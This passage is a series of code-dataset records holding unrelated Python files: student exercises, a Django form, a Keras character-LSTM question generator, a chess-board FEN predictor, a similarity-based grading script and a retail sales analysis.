(H-L)\\n\"))\r\n\r\n\r\n\r\nproducts = [\r\n {\r\n \"pid\":1,\r\n \"name\":\"A1\",\r\n \"cost\":15000,\r\n \"brand\":\"Lenovo\",\r\n \"category\":\"Mobiles\",\r\n \"rating\":3,\r\n \"discount\":65\r\n },\r\n{\r\n \"pid\":2,\r\n \"name\":\"A2\",\r\n \"cost\":22500,\r\n \"brand\":\"Lenovo\",\r\n \"category\":\"Mobiles\",\r\n \"rating\":4,\r\n \"discount\":52\r\n },\r\n{\r\n \"pid\":3,\r\n \"name\":\"B1\",\r\n \"cost\":18000,\r\n \"brand\":\"Samsung\",\r\n \"category\":\"Mobiles\",\r\n \"rating\":2,\r\n \"discount\":60\r\n },\r\n{\r\n \"pid\":4,\r\n \"name\":\"B2\",\r\n \"cost\":12500,\r\n \"brand\":\"Samsung\",\r\n \"category\":\"Mobiles\",\r\n \"rating\":3,\r\n \"discount\":40\r\n },\r\n{\r\n \"pid\":5,\r\n \"name\":\"C1\",\r\n \"cost\":45500,\r\n \"brand\":\"Samsung\",\r\n \"category\":\"TV\",\r\n \"rating\":4,\r\n \"discount\":35\r\n },\r\n{\r\n \"pid\":5,\r\n \"name\":\"C3\",\r\n \"cost\":43000,\r\n \"brand\":\"LG\",\r\n \"category\":\"TV\",\r\n \"rating\":4,\r\n \"discount\":35\r\n },\r\n{\r\n \"pid\":6,\r\n \"name\":\"C3\",\r\n \"cost\":38000,\r\n \"brand\":\"Sony\",\r\n \"category\":\"TV\",\r\n \"rating\":3,\r\n \"discount\":40\r\n },\r\n{\r\n \"pid\":7,\r\n \"name\":\"D1\",\r\n \"cost\":11000,\r\n \"brand\":\"JBL\",\r\n \"category\":\"Speaker\",\r\n \"rating\":1,\r\n \"discount\":40\r\n },\r\n{\r\n \"pid\":8,\r\n \"name\":\"D2\",\r\n \"cost\":8000,\r\n \"brand\":\"Sony\",\r\n \"category\":\"Speaker\",\r\n \"rating\":3,\r\n \"discount\":51\r\n },\r\n{\r\n \"pid\":9,\r\n \"name\":\"E1\",\r\n \"cost\":82000,\r\n \"brand\":\"HP\",\r\n \"category\":\"Laptop\",\r\n \"rating\":5,\r\n \"discount\":47\r\n },\r\n{\r\n \"pid\":10,\r\n \"name\":\"E1\",\r\n \"cost\":56000,\r\n \"brand\":\"ASUS\",\r\n \"category\":\"Laptop\",\r\n \"rating\":4,\r\n \"discount\":51\r\n }\r\n\r\n]\r\n\r\nprint (type(products))\r\n\r\n#sort\r\nsorttype 
=[[\"cost\",False],[\"cost\",True],[\"rating\",True],[\"discount\",False],[\"discount\",True]]\r\n\r\n\r\n\r\nproducts.sort(key = lambda ele: ele[sorttype[choice-1][0]], reverse=sorttype[choice-1][1])\r\n\r\n\r\nprint(\"Name\" ,\"Cost\" ,\"Brand\" ,\"Category\" ,\"Rating\" ,\"Discount\",sep=\"\\t\\t\")\r\nfor i in products:\r\n    print(i[\"name\"],\" \",i[\"cost\"],\" \",i[\"brand\"],\" \",i[\"category\"],\" \",i[\"rating\"],\" \",i[\"discount\"],sep=\"\\t\")\t\r\n\t\t\r\n#filter\r\nchoice2 = int(input(\"1.Filter by Name\\n\"\r\n                    \"2.Filter by Brand\\n\"\r\n                    \"3.Filter by Category\\n\"))\r\nfiltertype =[\"name\",\"brand\",\"category\"]\r\n\r\nstring = input(\"Enter : \")\r\n\r\nnewobj = filter(lambda ele: ele[filtertype[choice2-1]] == string,products)\r\n\r\n\r\nprint(\"Name    Cost    Brand   Category        Rating  Discount\") \r\n\r\nfor i in newobj:\r\n    print(i[\"name\"],\" \",i[\"cost\"],\" \",i[\"brand\"],\" \",i[\"category\"],\" \",i[\"rating\"],\" \",i[\"discount\"],sep=\"\\t\")\r\n\t\r\n\r\n\r\n\r\n\t\t\r\n\r\n\r\n\r\n\r\n","sub_path":"Assignments python/day2/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"102400417","text":"from minos.lib.util.measures import MeasureDistDirTime\n\nconfig = {\n    'task': 'point_goal',\n    'goal': {'position': 'random', 'radius': 0.25},\n    'measure_fun': MeasureDistDirTime(goal_dist_threshold=0.4),\n    'reward_type': 'dist_time',\n    'agent': {'radialClearance': 0.2},\n    'scene': {'dataset': 'mp3d'},\n    'scenes_file': '../data/scenes.mp3d.csv',\n    'states_file': '../data/episode_states.mp3d.csv.bz2',\n    'num_episodes_per_scene': 100,\n    'max_states_per_scene': 10,\n    'scene_filter': lambda s: 2 < s['nrooms'] < 11,\n    'episode_filter': lambda e: e['pathNumRooms'] > 0,\n    'objective_size': 4 # For UNREAL\n}\n","sub_path":"minos/config/envs/pointgoal_mp3d_s.py","file_name":"pointgoal_mp3d_s.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"408508717","text":"from django import forms\nfrom .models import Post, Comment\n\ndef min_length_3_validator(value):\n    if len(value) < 3:\n        raise forms.ValidationError('Please enter at least 3 characters.')\n\nclass PostForm(forms.Form):\n    title = forms.CharField(validators=[min_length_3_validator])    # title\n    text = forms.CharField(widget=forms.Textarea)   # body\n\n\n# Inherits from ModelForm\nclass PostModelForm(forms.ModelForm):\n    # ModelForm: builds a form bound to a Model\n    class Meta: # rule\n        model = Post\n        fields = ('title', 'text')\n        # Validation checks cannot be declared on the ModelForm this way,\n        # so they have to be handled on the Model.\n\nclass CommentModelForm(forms.ModelForm):\n    class Meta:\n        model = Comment\n        fields = ('author', 'text')","sub_path":"django/django_src/blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"263327735","text":"from typing import List, Tuple, Optional, Union\n\nfrom numpy import array, log2\nfrom numpy.random import choice,randint,shuffle\nfrom keras import Model\nfrom keras.layers import Input, Dropout, Dense, LSTM, Embedding, add\nfrom keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.utils import to_categorical\n\nfrom utils.poincare_encoder import PoincareEmbeddings\n\nclass SemanticCaptioningCharacterLSTMDecoder:\n    \"\"\"\n    generates a relevant question\n    when given the semantics of a sentence\n    using a 
custom-trained character-based LSTM \n and a pre-trained sentence encoder\n \"\"\"\n\n def __init__(self,recursion_depth:int,path_to_model_weights:Optional[str]=None) -> None:\n self.recursion_depth = recursion_depth\n self.semantic_encoder = PoincareEmbeddings(\"utils/poincare_embeddings.json\")\n a = ord('a')\n z = ord('z')\n is_valid_character = lambda character: character.isspace() or a <= ord(character) <= z\n self.clean_string = lambda text:''.join(filter(is_valid_character,text.lower().strip()))\n self.start_token='|'\n self.stop_token='?'\n character_set = [' '] + list(map(chr,range(a,z+1))) + [self.start_token,self.stop_token]\n self.index_character_mapping = dict(enumerate(character_set))\n self.character_index_mapping = {\n character:index for index,character in self.index_character_mapping.items()\n }\n self.number_of_characters = len(character_set)\n self.model = self.build_character_based_LSTM(\n semantic_vector_length=self.semantic_encoder.vector_length,\n character_vector_length=self.number_of_characters,\n character_sequence_length=self.recursion_depth,\n hidden_layer_length=100,\n dropout_rate=.0,\n activation=\"relu\",\n loss = \"categorical_crossentropy\",\n optimisation= \"adam\",\n weights=path_to_model_weights,\n )\n\n def train(\n self, questions:List[str], \n batch_size:int, epochs:int, \n save_to_file_path:str=\"char_lstm_weights.hdf5\",\n question_contexts:Optional[List[str]]=None\n ) -> None:\n \"\"\"\n if only questions are provided (e.g. from the Quora Dataset),\n the model is trained only on the unlabelled questions \n (attempting to do a type of Unsupervised Learning)\n in a fashion similar to Image Captioning (Image->Text)\n but using Semantics instead - Semantic Captioning (semantics->text)\n\n if question_contexts are provided too (the prompt that triggers each question)\n then the model similarly does Semantic Captioning (Contexts->Text)\n but uses the semantics of the question_contexts instead of the Questions\n (since the question_contexts are mapped to the questions, like labels, \n the model is now being trained via supervised learning)\n \"\"\"\n sample_size = len(questions)\n steps_per_epoch = sample_size//batch_size\n for epoch in range(epochs):\n chosen_index = randint(0,sample_size)\n expected_question = str(questions[chosen_index])\n example_sentence = expected_question if question_contexts is None else str(question_contexts[chosen_index])\n print(f\"epoch {epoch}: {example_sentence}\\n\\texpected: {expected_question}\\n\\ttop-p=.8,temperature=1.2 {self.generate(example_sentence,top_p=.8,temperature=1.2)}\\n\\ttop-p=.9 temperature = 1.2: {self.generate(example_sentence,top_p=.9,temperature=1.2)}\\n\\ttop_p=.8, temperature = .5: {self.generate(example_sentence,top_p=.8,temperature=.5)}\")\n self.model.fit(\n self._get_training_data(questions, batch_size, question_contexts), \n verbose=True, epochs=1, steps_per_epoch=steps_per_epoch, \n )\n self.model.save_weights(save_to_file_path)\n\n def _get_training_data(self,questions:List[str],batch_size:int,contexts:Optional[List[str]]) -> Tuple[Tuple[array,array],array]:\n question_numbers = list(range(len(questions)))\n iteration_count,X_meaning, X_characters, Y_characters = 0,[],[],[]\n while True:\n shuffle(question_numbers)\n for question_number in question_numbers:\n iteration_count+=1 \n question = questions[question_number]\n semantics = question if contexts is None else contexts[question_number]\n semantic_vector = self._get_semantic_vector(semantics)\n processed_question = 
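The inner loop of `_get_training_data` expands each question into one (context, next-character) pair per position, with contexts left-padded the way `pad_sequences` pads by default. A dependency-free sketch of that expansion (toy indexes, not the real vocabulary):

```python
# One training pair per character position, contexts left-padded with 0.
def expansion_pairs(indexes, depth):
    pad = lambda seq: [0] * (depth - len(seq)) + list(seq)
    return [(pad(indexes[:i]), indexes[i]) for i in range(1, len(indexes))]

assert expansion_pairs([5, 3, 9], depth=4) == [([0, 0, 0, 5], 3), ([0, 0, 5, 3], 9)]
```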
self._preprocess_characters(question)\n character_indexes = self._convert_characters_to_index(processed_question)\n for index in range(1, len(character_indexes)):\n contextual_character_indexes = character_indexes[:index]\n next_character_index = character_indexes[index] \n X_meaning.append(semantic_vector)\n X_characters.append(self._pad(indexes=contextual_character_indexes))\n Y_characters.append(self._one_hot_encode_output(next_character_index))\n\n if iteration_count==batch_size:\n yield ([array(X_meaning), array(X_characters)],array(Y_characters))\n iteration_count,X_meaning, X_characters, Y_characters = 0,[],[],[]\n\n \n def generate(self, sentence:str, temperature:Optional[float]=None, top_p:Optional[float]=None) -> str:\n \"\"\"\n given a conversation\n a question is asked about it\n (if no temperature specified\n use greedy decoding by default)\n \"\"\"\n conditional_vector = array([self._get_semantic_vector(sentence)])\n generated_question = self.start_token\n for _ in range(self.recursion_depth):\n generated_question += self._predict_next_character(\n meaning_vector=conditional_vector,\n contextual_characters=generated_question,\n temperature= temperature,\n top_percentage=top_p\n )\n if self.stop_token in generated_question:\n break\n return generated_question\n\n def _predict_next_character(self, meaning_vector:array,contextual_characters:str,temperature:Optional[float],top_percentage:Optional[float],return_probability:bool=False) -> Union[str,Tuple[str,float]]:\n \"\"\"\n pick most confident prediction\n this is local optimal but will not arrive at global optimal\n (use beam search for that)\n but optimal is not the most realistic decoding strategy\n better to pick a more varied range to add novelty (e.g. p-decoding)\n \"\"\"\n characters_vector = array([self._pad(self._convert_characters_to_index(contextual_characters))])\n output_vector = self.model.predict((meaning_vector,characters_vector),verbose=False)\n predicted_index = self._nucleus_decode(output_vector,top_percentage,temperature) if top_percentage else self._temperature_decode(output_vector,temperature) if temperature else self._greedy_decode(output_vector)\n predicted_character = self.index_character_mapping.get(predicted_index)\n if not return_probability: \n return predicted_character\n probability = output_vector[0][predicted_index]\n return (predicted_character,probability)\n\n def _convert_characters_to_index(self, characters:str) -> List[int]:\n return list(map(self.character_index_mapping.get,characters))\n\n def _pad(self, indexes:List[int]) -> array:\n return pad_sequences([indexes], maxlen=self.recursion_depth)[0]\n\n def _get_semantic_vector(self, text:str) -> array:\n return self.semantic_encoder.encode(self.clean_string(text))\n\n def _one_hot_encode_output(self, index:int) -> array:\n return to_categorical([index], num_classes=self.number_of_characters)[0]\n\n def _preprocess_characters(self, text:str) -> str:\n return f\"{self.start_token} {self.clean_string(text)} {self.stop_token}\"\n\n @staticmethod\n def _nucleus_decode(predicted_vector:array, top_p:float, temperature:Optional[float]) -> int:\n probabilities = predicted_vector[0]\n probabilities /= probabilities.sum()\n ranked_indexes = sorted(range(probabilities.size), key=lambda index:probabilities[index],reverse=True)\n probabilities.sort()\n ranked_probabilities = probabilities[::-1]\n for index in range(ranked_probabilities.size):\n if ranked_probabilities[:index].sum() >= top_p:\n nuclues_probabilities = ranked_probabilities[:index]\n 
nuclues_indexes = ranked_indexes[:index]\n break\n if temperature: nuclues_probabilities *= temperature\n nuclues_probabilities /= nuclues_probabilities.sum()\n return choice(nuclues_indexes,1,p=nuclues_probabilities)[0]\n \n @staticmethod\n def _temperature_decode(predicted_vector:array,temperature:float) -> int:\n probabilities = predicted_vector[0]\n probabilities *= temperature\n probabilities /= probabilities.sum()\n return choice(range(probabilities.size),1,p=probabilities)[0]\n\n @staticmethod\n def _greedy_decode(predicted_vector:array) -> int:\n return predicted_vector[0].argmax()\n\n @staticmethod\n def build_character_based_LSTM(\n semantic_vector_length:int,\n character_vector_length:int,\n character_sequence_length:int,\n hidden_layer_length:int,\n dropout_rate:float,\n optimisation:str,\n activation:str,\n weights:Optional[str],\n loss:str,\n ) -> Model:\n\n meaning_layer1 = Input(shape=(semantic_vector_length,))\n meaning_dropout1 = Dropout(dropout_rate)(meaning_layer1)\n meaning_layer2 = Dense(hidden_layer_length, activation=activation)(meaning_dropout1)\n characters_layer1 = Input(shape=(character_sequence_length,))\n characters_layer2 = Embedding(character_vector_length, character_vector_length, mask_zero=True)(characters_layer1)\n characters_dropout2 = Dropout(dropout_rate)(characters_layer2)\n characters_layer3 = LSTM(hidden_layer_length,return_sequences=True)(characters_dropout2)\n characters_dropout3 = Dropout(dropout_rate)(characters_layer3)\n characters_layer4 = LSTM(hidden_layer_length)(characters_dropout3)\n layer3 = add([meaning_layer2, characters_layer4])\n layer4 = Dense(hidden_layer_length, activation=activation)(layer3)\n layer5 = Dense(character_vector_length, activation='softmax')(layer4)\n model = Model(\n inputs=[meaning_layer1, characters_layer1], \n outputs=layer5\n )\n if weights is not None: model.load_weights(weights)\n model.compile(loss=loss, optimizer=optimisation)\n return model ","sub_path":"src/semantic_captioning_character_lstm_decoder.py","file_name":"semantic_captioning_character_lstm_decoder.py","file_ext":"py","file_size_in_byte":10856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"145425118","text":"import tensorflow\nimport numpy\nimport io\nimport os\n\nfrom base64 import b64decode\nfrom skimage import transform\nfrom skimage.io import imread\nfrom skimage.util.shape import view_as_blocks\n\nDIM = 8 # Chess board 8 x 8\nSQUARE_SIZE = 40 # Tile size\nPIECE_SYMBOLS = \"prbnkqPRBNKQ \" # Chess piece symbols\nLABEL2SYMBOL = {p:i for i, p in enumerate(PIECE_SYMBOLS)} # Map to convert lables back to piece symbols\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n\ndef preprocess_image(img: numpy.ndarray) -> numpy.ndarray:\n \"\"\"Preprocess an image for using it as model input. 
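Two caveats about `_nucleus_decode` above are worth recording: if the probabilities never accumulate to `top_p` (possible through float round-off when `top_p` is close to 1), the nucleus variables are never assigned; and multiplying every kept probability by the temperature and then renormalising is a no-op, since temperature only changes a distribution when applied as an exponent (or to logits). A standalone numpy sketch of top-p filtering that avoids both issues:

```python
import numpy as np

def top_p_filter(probs, p, temperature=1.0, rng=None):
    rng = rng or np.random.default_rng()
    scaled = probs ** (1.0 / temperature)        # temperature as an exponent
    scaled /= scaled.sum()
    order = np.argsort(scaled)[::-1]
    cutoff = np.searchsorted(np.cumsum(scaled[order]), p) + 1
    keep = order[:cutoff]                        # always at least one token
    kept = scaled[keep] / scaled[keep].sum()
    return int(rng.choice(keep, p=kept))

token = top_p_filter(np.array([0.5, 0.3, 0.15, 0.05]), p=0.8,
                     rng=np.random.default_rng(0))
assert token in (0, 1)  # only the two most likely tokens survive p=0.8
```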
Initially the image is downsampled\n and then it is split to blocks.\n\n Args:\n img (numpy.ndarray): Image as a numpy array\n\n Returns:\n numpy.ndarray: Preprocessed image \n \"\"\"\n downsample_size = SQUARE_SIZE*DIM\n\n img_read = transform.resize(\n img,\n (downsample_size, downsample_size),\n mode='constant'\n )[:,:,:3] # Drop alpha in case of png\n\n tiles = view_as_blocks(img_read, block_shape=(SQUARE_SIZE, SQUARE_SIZE, 3)).squeeze(axis=2)\n return tiles.reshape(DIM*DIM, SQUARE_SIZE, SQUARE_SIZE, 3)\n\ndef deserialize_image(img_payload: str) -> numpy.ndarray:\n \"\"\"Returns an image byte-like object from base64 payload\n\n Args:\n img_payload (str): base64 encoded image\n\n Returns:\n bytes: Image as numpy array\n \"\"\"\n return imread(io.BytesIO(b64decode(img_payload))) / 255\n\ndef reconstruct_from_blocks(img: numpy.ndarray) -> numpy.ndarray:\n \"\"\"Reconstructs the original image from a given preprocessed image.\n The preprocessed image is split into blocks and this function stitches them back together.\n\n Args:\n preprocessed_img (numpy.ndarray): Preprocessed image as numpy array\n\n Returns:\n numpy.ndarray: Reconstructed image as numpy array\n \"\"\"\n return img.numpy().reshape(\n DIM, DIM, SQUARE_SIZE, SQUARE_SIZE, 3\n ).transpose(0, 2, 1, 3, 4).reshape(\n SQUARE_SIZE * DIM,SQUARE_SIZE * DIM, 3\n )\n\ndef labels2fen(labels: numpy.ndarray) -> str:\n \"\"\"Converts arithmetic piece symbol labels to fen notation\n\n Args:\n labels (numpy.ndarray): \n\n Returns:\n str: FEN notation of the give piece labels\n \"\"\"\n fen = \"/\".join(\"\".join(PIECE_SYMBOLS[p] for p in row) for row in labels)\n for i in range(DIM, 0, -1):\n fen = fen.replace(' ' * i, str(i))\n return fen\n\ndef fen2labels(fen: str) ->numpy.ndarray:\n \"\"\"Converts fen notation to arithmetic labels. 
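For the tiling in `preprocess_image` above, the shape arithmetic is worth pinning down. Assuming scikit-image is available, a quick standalone check that an 8×8 board at 40 px per square yields 64 model-ready tiles:

```python
import numpy as np
from skimage.util.shape import view_as_blocks

board = np.zeros((320, 320, 3))  # DIM * SQUARE_SIZE = 8 * 40 = 320
blocks = view_as_blocks(board, block_shape=(40, 40, 3))
assert blocks.shape == (8, 8, 1, 40, 40, 3)            # the channel axis stays
tiles = blocks.squeeze(axis=2).reshape(64, 40, 40, 3)  # 64 squares for the model
assert tiles.shape == (64, 40, 40, 3)
```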
\n\n Args:\n fen (str): FEN notation as string sequence\n\n Returns:\n numpy.ndarray: Numpy array containing the piece labels \n \"\"\"\n labels = []\n for row in fen.split(\"/\"):\n row_labels = []\n for p in row:\n row_labels += (int(p) * [LABEL2SYMBOL[' ']] if p.isnumeric() else [LABEL2SYMBOL[p]])\n labels += [row_labels]\n return numpy.array(labels)\n\ndef difference(img_a: numpy.ndarray, img_b: numpy.ndarray) -> numpy.float64:\n \"\"\"Returns the maximum difference amongst the pixels of two images.\n\n Args:\n img_a (numpy.ndarray): Image A as numpy array\n img_b (numpy.ndarray): Image B as numpy array\n\n Returns:\n numpy.float64: Pixel difference\n \"\"\"\n difference = (img_a - img_b).reshape(-1)\n return max(difference.max(), abs(difference.min()))\n\ndef is_visually_similar(img_a: numpy.ndarray, img_b: numpy.ndarray, threshold: float) -> bool:\n \"\"\"Checks whether two images are visually similar given difference threshold.\n The lower the threshold, the more visually similar the images must be\n\n Args:\n img_a (numpy.ndarray): Image A as numpy array\n img_b (numpy.ndarray): Image B as numpy array\n threshold (float): Difference threshold\n\n Returns:\n bool: True if similarity is below threshold, False otherwise\n \"\"\"\n diff = difference(img_a, img_b)\n print(\"diff: \", diff)\n return diff <= threshold \n\ndef predict_fen(img: numpy.ndarray, model_path: str = os.path.join(BASE_DIR,\"model\")) -> str:\n \"\"\"Predicts the FEN notation of the given board image.\n Image dimensions must be 320x320\n\n Args:\n img (numpy.ndarray): Image as numpy array\n model_path (str): Path of the saved model to use\n \n Returns:\n str: FEN notation as a string \n \"\"\"\n model = tensorflow.keras.models.load_model(model_path)\n prediction = model.predict(img)\n board = prediction.argmax(axis=1).reshape(DIM, DIM)\n return labels2fen(board)","sub_path":"AI/Neuralmate/neuralmate.py","file_name":"neuralmate.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"67038924","text":"import pymysql\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib import pyplot\n\n\ndef draw(similar, label):\n plt.plot(similar, label, 'o', color='b')\n plt.show()\n\n\n# draw()\ndb = pymysql.connect(\"127.0.0.1\", \"root\", \"qq123456\", \"detect_web\")\ncursor = db.cursor()\nsql = \"SELECT * FROM user_compare_detail where cid_id=29 order by similar DESC\"\ncursor.execute(sql)\nsimilar = []\nfor data in cursor.fetchall():\n similar.append(data)\n\nusers = []\nfor data in similar:\n if data[1] not in users:\n users.append(data[1])\n if data[2] not in users:\n users.append(data[2])\n\nprint(users)\n\nsql = \"SELECT distinct user1 FROM user_compare_detail where cid_id=29\"\ncursor.execute(sql)\nuser = {}\nfor u in users:\n t = []\n for d in similar:\n if d[1] == u or d[2] == u:\n t.append(d)\n user.setdefault(u, t)\n\n# score = {\"02小明同学\": 99, \"18抄袭狂魔同学\": 88, \"03小东同学\": 78}\nscore = {}\nprior = []\nmustHand = []\nevalues = []\nfor key in user.keys():\n \"评分\"\n if not (key in score):\n \"取前两个最相近的同学分数\"\n print(\"********************************************\")\n print(key)\n userlist = user.get(key)\n u1 = userlist[0]\n u2 = userlist[1]\n print(\"两个最接近的同学\")\n print(u1)\n print(u2)\n print(\"+++++++++++++++++++++++++++++++\")\n\n if float(u1[3]) <= 70 or float(u2[3]) <= 70:\n print(\"无法评估,\" + str(key) + \"同学成绩,参考用户相似度过低\")\n mustHand.append(key)\n continue\n\n u1_key = \"\"\n u2_key = \"\"\n if u1[1] == 
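The estimate computed further down, `evalue = 2 / ((1 / u1_score) + (1 / u2_score))`, is the harmonic mean of the two most similar students' scores, which skews toward the lower of the two. A standalone check against the standard library:

```python
from statistics import harmonic_mean

u1_score, u2_score = 80, 60
evalue = 2 / ((1 / u1_score) + (1 / u2_score))
assert round(evalue, 6) == round(harmonic_mean([u1_score, u2_score]), 6)  # ~68.571429
```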
key:\n u1_key = u1[2]\n else:\n u1_key = u1[1]\n \"获取第一个用户与第二个用户的评估分值\"\n if u2[1] == key:\n u2_key = u2[2]\n else:\n u2_key = u2[1]\n\n u1_score = score.get(u1_key)\n u2_score = score.get(u2_key)\n if (u1_score is None) or (u2_score is None):\n print(\"无法评估,\" + str(key) + \"同学成绩,参考用户未评分\")\n if u1_key not in score:\n score.setdefault(u1_key, 0)\n prior.append(u1_key)\n if u2_key not in score:\n score.setdefault(u2_key, 0)\n prior.append(u2_key)\n evalues.append(key)\n continue\n\n print(\"u1 score, u2 score\", str(u1_score), str(u2_score))\n evalue = 2 / ((1 / u1_score) + (1 / u2_score))\n evalue = int(evalue)\n print(\"同学:\" + str(key) + \",评估分值:\" + str(evalue))\n score.setdefault(key, evalue)\n print(\"********************************************\")\n evalues.append(key)\n\nprint(\"++++++++++++++++++++++++++++++++++++++++++++\")\nprint(score)\nprint(\"建议优先评分:\")\nprint(prior)\nprint(\"必须手工评分:\")\nprint(mustHand)\nprint(\"可进行自动评分:\")\nprint(evalues)\n","sub_path":"local-draw.py","file_name":"local-draw.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"490618595","text":"agenda = [['Ana', '99999-1234'], ['Bia', '99999-5678']]\n\np = 'd'\nwhile p != 'c':\n print('(a) Adicionar telefones na agenda')\n print('(b) Procurar um telefone')\n print('(c) Sair')\n p = str(input('-> '))\n if p == 'a':\n nome = str(input('Digite o nome? '))\n numero = str(input('Digite o numero? '))\n aux = ['','']\n aux[0] = nome\n aux[1] = numero\n agenda.append(aux)\n agenda = sorted(agenda)\n print('Adicionado.\\n')\n elif p == 'b':\n nome = str(input('Digite o nome? '))\n b = False\n for i in agenda:\n if i[0] == nome:\n print(i[1])\n b = True\n if b == False:\n print('Não está na agenda.')\n\nprint(agenda)\n","sub_path":"Lista de exercicios 5/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"462657123","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport os\nimport logging\nimport gc\nfrom multiprocessing import Pool\nfrom functools import partial\n\nprice_threshold=10\n\n\n# In[2]:\n\n# last_saturday=datetime.datetime.now().date()-datetime.timedelta(days=(datetime.datetime.now().date().weekday()+2))\n# print(last_saturday)\nlast_saturday=datetime.date(2019,2,2) # To be changed to the running Tuesday\nlogging.basicConfig(filename='V2_Multiprocessing_'+str(last_saturday)+'.log', level=logging.INFO)\n\n\n# In[3]:\n\noutput_folder=\"/home/jian/celery/DBasket/output/\"\n\noutput_folder=output_folder+str(last_saturday)+\"/\"\n\ntry:\n os.stat(output_folder)\nexcept:\n os.mkdir(output_folder)\n\n\n# In[4]:\n\ndef recursive_file_gen(my_root_dir):\n for root, dirs, files in os.walk(my_root_dir):\n for file in files:\n yield os.path.join(root, file)\n \nmost_recent_daily_data=list(recursive_file_gen(\"/home/jian/BigLots/\"))\nmost_recent_daily_data=[x for x in most_recent_daily_data if (\"MediaStormDailySales\" in x) and (str(last_saturday) in x)]\n\nif len(most_recent_daily_data)==1:\n most_recent_daily_data=most_recent_daily_data[0]\nelse:\n most_recent_daily_data=np.nan\n logging.info(\"Last Weekly Daily Data Error\", str(datetime.datetime.now()))\n\n\n# In[5]:\n\nmost_recent_daily_data\n\n\n# In[6]:\n\ndata=pd.read_table(most_recent_daily_data,dtype=str,sep=\"|\")\nprint(\"len_sub_class_id:\",data['subclass_id'].apply(lambda x: 
len(x)).unique())\nprint(\"len_class_code_id:\",data['class_code_id'].apply(lambda x: len(x)).unique())\ndata['subclass_id']=data['subclass_id'].apply(lambda x: x.zfill(3))\ndata['product_comb']=data['class_code_id']+\"-\"+data['subclass_id']\n\ndata['subclass_transaction_amt']=data['subclass_transaction_amt'].astype(float)\ndata['subclass_transaction_units']=data['subclass_transaction_units'].astype(int)\ndata=data[(data['subclass_transaction_amt']>0) & (data['subclass_transaction_units']>0)]\n\ndata['price']=data['subclass_transaction_amt']/data['subclass_transaction_units']\n\n\n# In[7]:\n\ntaxonomy=pd.read_csv(\"/home/jian/BigLots/static_files/ProductTaxonomy/MediaStormProductTaxonomy20190201-133832-059.txt\",dtype=str,sep=\"|\")\ntaxonomy['subclass_id']=taxonomy['subclass_id'].apply(lambda x: x.zfill(3))\ndivision_id_id_name=pd.read_table(\"/home/jian/BigLots/static_files/MediaStorm Data Extract - Division Names.txt\",dtype=str,sep=\"|\")\ndepartment_id_name=pd.read_table(\"/home/jian/BigLots/static_files/MediaStorm Data Extract - Department Names.txt\",dtype=str,sep=\"|\")\nclass_id_name=pd.read_table(\"/home/jian/BigLots/static_files/MediaStorm Data Extract - Class Names.txt\",dtype=str,sep=\"|\",encoding ='ISO-8859-1')\n# \n\ndata_item_avg_price=data[['product_comb','price']].groupby(['product_comb'])['price'].mean().to_frame().reset_index()\ndata_item_avg_price=data_item_avg_price.rename(columns={\"price\":\"avg_price\"})\n\ndata_item_avg_price['class_code_id']=data_item_avg_price['product_comb'].apply(lambda x: x.split(\"-\")[0])\ndata_item_avg_price['subclass_id']=data_item_avg_price['product_comb'].apply(lambda x: x.split(\"-\")[1])\n\ndata_item_avg_price=pd.merge(data_item_avg_price,taxonomy,on=['class_code_id','subclass_id'],how=\"left\")\n\n\ndata_item_avg_price=pd.merge(data_item_avg_price,division_id_id_name,on=\"division_id\",how=\"left\")\ndata_item_avg_price=pd.merge(data_item_avg_price,department_id_name,on=\"department_id\",how=\"left\")\ndata_item_avg_price=pd.merge(data_item_avg_price,class_id_name,on=\"class_code_id\",how=\"left\")\ndata_item_avg_price=data_item_avg_price[['product_comb','avg_price','division_id','division_desc','department_id','department_desc',\n 'class_code_id','class_code_desc','subclass_id','subclass_desc']]\n\ndata_item_avg_price.to_csv(output_folder+\"/Price_\"+str(last_saturday)+\".csv\",index=False)\n\n\n# In[8]:\n\n# $10 of all items as in the email on 2019-01-14\n\nproduct_comb_under_10_set=set(data_item_avg_price[data_item_avg_price['avg_price']=10]['product_comb'].unique().tolist()\nproduct_comb_10_and_above_df=data_item_avg_price.sort_values('avg_price',ascending=False)\nproduct_comb_10_and_above_df=product_comb_10_and_above_df[product_comb_10_and_above_df['avg_price']>=10].reset_index()\ndel product_comb_10_and_above_df['index']\n\nprint(data.shape)\ndata=data[~data['product_comb'].isin(product_comb_under_10_set)]\ndata_under_10=data[data['product_comb'].isin(product_comb_under_10_set)]\ndata=data.reset_index()\ndel data['index']\nprint(data.shape)\ndict_item_avg_price=data_item_avg_price.set_index(['product_comb'])['avg_price'].to_dict()\n\n\n# In[9]:\n\ndel data['class_code_id']\ndel data['subclass_id']\ndata_NonRewards=data[pd.isnull(data['customer_id_hashed'])]\ndata_Rewards=data[~pd.isnull(data['customer_id_hashed'])]\n\nprint(\"Rewards - Row_RawData:\",data_Rewards.shape)\nprint(\"Rewards - Unique_id:\", len(data_Rewards['customer_id_hashed'].unique()))\n\nprint(\"Non_Rewards - 
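The sub-$10 split above boils down to a per-unit price, a per-product mean, and a threshold partition; a toy, self-contained pandas version (invented rows, not the sales extract):

```python
import pandas as pd

df = pd.DataFrame({"product_comb": ["100-001", "100-001", "200-002"],
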